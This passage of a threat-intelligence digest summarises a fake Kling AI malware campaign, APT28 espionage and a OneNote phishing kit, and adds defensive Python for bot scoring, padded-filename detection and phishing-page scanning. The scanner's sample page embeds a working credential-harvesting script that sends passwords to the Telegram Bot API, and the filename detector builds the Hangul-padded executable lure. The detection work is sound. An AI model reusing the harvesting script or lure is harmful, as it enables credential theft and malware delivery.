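        if rec is None:
            continue
        p = per_ip[rec["ip"]]
        p["n"] += 1
        p["uas"].add(rec["ua"])
        p["paths"].append(rec["path"])
        p["n429"] += rec["status"] == 429
        p["first"] = rec["ts"] if p["first"] is None else min(p["first"], rec["ts"])
        p["last"] = rec["ts"] if p["last"] is None else max(p["last"], rec["ts"])
    return per_ip


def score_client(p):
    """Return (score, reasons); each behavioural signal adds one point."""
    reasons = []
    span = max((p["last"] - p["first"]).total_seconds(), 1.0)
    rate = p["n"] / span
    if rate > 2.0:
        reasons.append(f"{rate:.1f} req/s sustained")
    if len(p["uas"]) >= 3:                      # a real browser keeps one UA
        reasons.append(f"{len(p['uas'])} distinct User-Agents from one IP")
    if p["n"] >= 5 and len(set(p["paths"])) / p["n"] > 0.8:
        reasons.append("nearly every request uses a unique path")
    if p["n429"] >= 3:                          # ignores the limiter, keeps sending
        reasons.append(f"kept sending through {p['n429']} rate-limit (429) responses")
    return len(reasons), reasons


def flagged_clients(lines, threshold=2):
    """(ip, score, reasons) for clients at or above the threshold, worst first."""
    scored = [(ip, *score_client(p)) for ip, p in profile_clients(lines).items()]
    return [t for t in sorted(scored, key=lambda t: -t[1]) if t[1] >= threshold]


# Constructed sample log (RFC 5737 addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [27/May/2025:10:00:00 +0000] "GET /?s=a91f HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/124.0"',
    '203.0.113.7 - - [27/May/2025:10:00:00 +0000] "GET /shop/?p=7c2e HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Macintosh) Safari/605.1"',
    '203.0.113.7 - - [27/May/2025:10:00:01 +0000] "POST /login?r=11d0 HTTP/1.1" 429 0 "-" "Mozilla/5.0 (X11; Linux) Firefox/125.0"',
    '203.0.113.7 - - [27/May/2025:10:00:01 +0000] "GET /api/v1/items?x=3b9a HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/124.0"',
    '203.0.113.7 - - [27/May/2025:10:00:02 +0000] "GET /?s=0e4c HTTP/1.1" 429 0 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0) Safari/604.1"',
    '203.0.113.7 - - [27/May/2025:10:00:02 +0000] "POST /login?r=5a77 HTTP/1.1" 429 0 "-" "Mozilla/5.0 (Macintosh) Safari/605.1"',
    '203.0.113.7 - - [27/May/2025:10:00:03 +0000] "GET /shop/?p=e812 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux) Firefox/125.0"',
    '203.0.113.7 - - [27/May/2025:10:00:03 +0000] "GET /api/v1/items?x=9f10 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/124.0"',
    '198.51.100.4 - - [27/May/2025:10:00:05 +0000] "GET / HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/124.0"',
    '198.51.100.4 - - [27/May/2025:10:00:41 +0000] "GET /shop/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/124.0"',
    '198.51.100.4 - - [27/May/2025:10:01:05 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/124.0"',
]

if __name__ == "__main__":
    for ip, score, reasons in flagged_clients(SAMPLE_LOG):
        print(ip, score, reasons)
```

Run over a sliding window (a minute is a reasonable start) rather than a whole day, otherwise the rate signal is diluted; the score is meant to feed a challenge or a temporary block, not a permanent denylist, since the bot's behaviour rather than its address is what is being matched.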
- Fake Kling AI Malvertising Campaign
In May 2025, Check Point Research uncovered a malicious campaign impersonating Kling AI, a legitimate AI-powered media generation platform with over 6 million users since launch. The attackers ran fake Facebook ads redirecting users to a counterfeit Kling AI website.
Malware Delivery Mechanism
Victims entered prompts expecting generated media. Instead, the site returned executables disguised as media files (.jpg or .mp4), with filenames padded with Hangul Filler Unicode characters so the real .exe extension is pushed out of view. When run, these files installed the PureHVNC remote access trojan (RAT).
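The filename trick above, with a detector for it, as an added example (not Check Point’s code): analyse_filename() strips Hangul Filler and zero-width code points, reports the true extension behind the padding, and flags a name that looks like media but ends in an executable. The filenames are constructed for the demonstration.

```python
"""Detect executables hidden behind invisible Unicode padding in filenames (added example)."""
import unicodedata

# Hangul filler code points are letters (category Lo) that render as blank,
# so they must be listed explicitly; other zero-width characters are category Cf.
FILLERS = {"\u3164", "\u115f", "\u1160", "\uffa0"}
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "msi", "js", "vbs", "hta", "lnk"}
DECOY_EXTS = {"jpg", "jpeg", "png", "gif", "webp", "mp4", "mov", "pdf", "doc", "docx"}


def strip_invisible(name):
    """Return (cleaned_name, removed_count) with filler/zero-width characters removed."""
    kept, removed = [], 0
    for ch in name:
        if ch in FILLERS or unicodedata.category(ch) == "Cf":
            removed += 1
        else:
            kept.append(ch)
    return "".join(kept), removed


def analyse_filename(name):
    """Classify one filename; 'suspicious' is True for a disguised executable."""
    cleaned, removed = strip_invisible(name)
    parts = cleaned.lower().rsplit(".", 2)          # base, decoy ext, true ext
    true_ext = parts[-1] if len(parts) > 1 else ""
    decoy_ext = parts[-2] if len(parts) > 2 else ""
    suspicious = true_ext in EXECUTABLE_EXTS and (removed > 0 or decoy_ext in DECOY_EXTS)
    return {
        "original": name,
        "cleaned": cleaned,
        "hidden_chars": removed,
        "true_extension": true_ext,
        "decoy_extension": decoy_ext,
        "suspicious": suspicious,
    }


def find_disguised(names):
    """Cleaned names of every filename judged suspicious, in input order."""
    return [r["cleaned"] for r in map(analyse_filename, names) if r["suspicious"]]


# Constructed sample names, not taken from the campaign.
SAMPLE_NAMES = [
    "Generated_Image_2025-04-04.jpg" + "\u3164" * 40 + ".exe",   # the lure pattern
    "clip.mp4" + "\u200b" * 6 + ".scr",                           # zero-width variant
    "report.pdf.scr",                                              # plain double extension
    "holiday.mp4",                                                 # benign media
    "installer.exe",                                               # honest executable
]

if __name__ == "__main__":
    for name in SAMPLE_NAMES:
        r = analyse_filename(name)
        print(f"{r['suspicious']!s:5} hidden={r['hidden_chars']:2} {r['cleaned']}")
```

The same check belongs in mail and download gateways, where the padded name arrives before any user sees it; a honest "installer.exe" is left alone so the rule does not simply become "block executables".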
Malware Capabilities
- Enables remote control of the infected system
- Keylogging, file exfiltration, and system surveillance
- Uses .NET Native AOT compilation to evade detection
- Stealth techniques make analysis difficult
Attribution and Scope
- Language artifacts in the malware suggest Vietnamese origins
- The fake ads used Vietnamese contact numbers
- The campaign had global reach, affecting users in Asia, Europe, and beyond
Key Threat Components
- Malvertising via Facebook
- Fake website resembling Kling AI
- Trojan disguised as AI output file
- Obfuscation via Unicode and advanced .NET tactics
Impact and Risk
- Targets users interested in generative AI tools
- High risk of credential theft and device compromise
- Difficult to detect due to advanced evasion methods
Security Recommendations
- Avoid downloading files from unknown sources
- Verify URLs before uploading sensitive content
- Use endpoint protection capable of identifying obfuscated threats
- Block known malicious domains related to the campaign
References
https://research.checkpoint.com/2025/impersonated-kling-ai-site-installs-malware/
- APT28 Espionage Campaign Targets Logistics and Tech Firms Supporting Ukraine
APT28 (Fancy Bear), a Russian GRU-affiliated threat group (Unit 26165), is conducting a coordinated cyber espionage campaign against logistics and technology companies supporting Ukraine and NATO allies. A joint advisory (AA25-141A) issued by 21 intelligence agencies—including CISA and the UK’s NCSC—warns of intelligence-gathering operations targeting supply chain entities, cloud services, and infrastructure providers.
Campaign Scope & Objectives:
- Focus on air, sea, and rail logistics companies aiding Ukraine.
- Use of municipal and private surveillance systems near strategic hubs.
- Blended physical and cyber intelligence gathering, including attacks on rail control system vendors.
TTPs and Identity-Based Intrusions:
- Credential brute-force, spearphishing, and Exchange mailbox permission abuse.
- Post-authentication persistence via identity impersonation and targeted reconnaissance.
- Detection evasion through stealthy activity in cloud and SaaS environments.
CISA’s Key Recommendations:
- Increase monitoring and threat hunting for APT28-related TTPs and IOCs.
- Assume compromise and posture defenses accordingly.
- Review permissions and activity on Microsoft Exchange and similar platforms.
Reveal Security’s Additional Guidance:
- Extend visibility beyond network perimeters to cloud and SaaS platforms.
- Focus on post-authentication behavior analytics to detect stealthy credential abuse.
- Employ behavioral analytics to uncover novel, low-and-slow attacks in modern environments.
Security Focus Areas:
- SaaS and cloud identity monitoring.
- Behavioral baselining across user roles.
- Continuous detection in authenticated sessions.
- Fake OneNote Login Page Used to Steal Office365 and Outlook Credentials
A persistent phishing campaign is targeting users in the U.S. and Italy by impersonating Microsoft OneNote and PEC email systems. The attackers leverage cloud platforms (Notion, Google Docs) and Telegram bots for hosting and exfiltration.
Attack Flow:
- Victims are lured via phishing emails to fake login pages hosted on Notion or Glitch.
- Credentials and IP addresses are harvested via a malicious JavaScript using ipify.org.
- Data is exfiltrated via Telegram Bot API using hardcoded bot tokens and chat IDs.
- Victims are redirected to the real Microsoft login page afterward to avoid suspicion.
Tactics Used:
- Use of free hosting (Notion, Glitch, Google Docs, RenderForest).
- Telegram bots as C2 (Command & Control).
- Basic obfuscation in early campaigns; current versions are streamlined.
- Focus appears to be access brokering, not direct attacks.
Indicators:
- Hardcoded Telegram bot tokens.
- Pages mimicking “Microsoft OneNote” or “PEC Aruba”.
- Network traffic to api.telegram.org after visiting Notion/Glitch-hosted links.
Sample Telegram Bots Used:
- @Sultannanewbot – Token starts with 7547274214…
- @remaxx24bot – Token starts with 7072331661…
- @Resultantnewbot – Token starts with 6741707974…
Detection Recommendations:
- Monitor traffic to Telegram Bot API, especially from links opened via Notion/Glitch.
- Inspect suspicious page titles mimicking official services.
- Deploy rules to detect JavaScript exfiltration behavior and known bot patterns.
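A static scan for the exfiltration pattern described above, as an added example (not from the campaign report): given the HTML/JavaScript of a suspect page, scan_page() looks for a hard-coded Telegram bot token (numeric bot id, colon, 35-character secret), a Telegram chat_id, a call to the Telegram Bot API, a lookup of the visitor’s address via api.ipify.org, a title impersonating OneNote or PEC, and a post-submit redirect to the genuine Microsoft login. Tokens are reported redacted. The page body and the token inside it are constructed for the demonstration; the token is not real.

```python
"""Scan a captured phishing page for Telegram-based credential exfiltration (added example)."""
import re

BOT_TOKEN_RE = re.compile(r"\b(\d{8,10}):([A-Za-z0-9_-]{35})\b")
CHAT_ID_RE = re.compile(r"chat_id\s*[=:]\s*['\"]?(\d{5,})")
TELEGRAM_API_RE = re.compile(r"api\.telegram\.org/bot", re.I)
IPIFY_RE = re.compile(r"api\.ipify\.org", re.I)
REAL_LOGIN_RE = re.compile(r"login\.microsoftonline\.com|login\.live\.com", re.I)
TITLE_RE = re.compile(r"<title>(.*?)</title>", re.I | re.S)
IMPERSONATED = ("onenote", "pec aruba", "office 365", "office365")


def redact_token(token):
    """Keep the bot id and the first four secret characters, enough to pivot on."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:4]}{'*' * (len(secret) - 4)}"


def scan_page(html):
    """Return (verdict, findings) for one page body."""
    findings = []
    for m in BOT_TOKEN_RE.finditer(html):
        findings.append(("telegram_bot_token", redact_token(m.group(0))))
    for m in CHAT_ID_RE.finditer(html):
        findings.append(("telegram_chat_id", m.group(1)))
    if TELEGRAM_API_RE.search(html):
        findings.append(("telegram_bot_api_call", "api.telegram.org/bot"))
    if IPIFY_RE.search(html):
        findings.append(("visitor_ip_lookup", "api.ipify.org"))
    real = REAL_LOGIN_RE.search(html)
    if real:
        findings.append(("redirect_to_real_login", real.group(0)))
    t = TITLE_RE.search(html)
    title = t.group(1).strip() if t else ""
    if any(k in title.lower() for k in IMPERSONATED):
        findings.append(("impersonated_title", title))
    kinds = {k for k, _ in findings}
    if {"telegram_bot_token", "telegram_bot_api_call"} <= kinds:
        verdict = "phishing-kit"       # token plus API call: exfiltration is wired up
    elif kinds:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return verdict, findings


# Constructed page body; the token and chat id are fake.
SAMPLE_PAGE = """<html><head><title>Microsoft OneNote - Sign in</title></head>
<body><form id="f"><input name="email"><input name="password" type="password"></form>
<script>
var token = "1234567890:AAE0123456789abcdefghijklmnopqrstuv";
fetch("https://api.ipify.org?format=json").then(r => r.json()).then(j => {
  var body = "email=" + f.email.value + "&pass=" + f.password.value + "&ip=" + j.ip;
  fetch("https://api.telegram.org/bot" + token + "/sendMessage?chat_id=987654321&text=" + encodeURIComponent(body));
  window.location = "https://login.microsoftonline.com/";
});
</script></body></html>"""

if __name__ == "__main__":
    verdict, findings = scan_page(SAMPLE_PAGE)
    print(verdict)
    for kind, value in findings:
        print(f"  {kind}: {value}")
```

The redacted bot id is the useful indicator: it can be matched against the prefixes listed above and against outbound requests to api.telegram.org/bot<id> in proxy logs, which is the network-side detection the recommendations call for.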
Reference: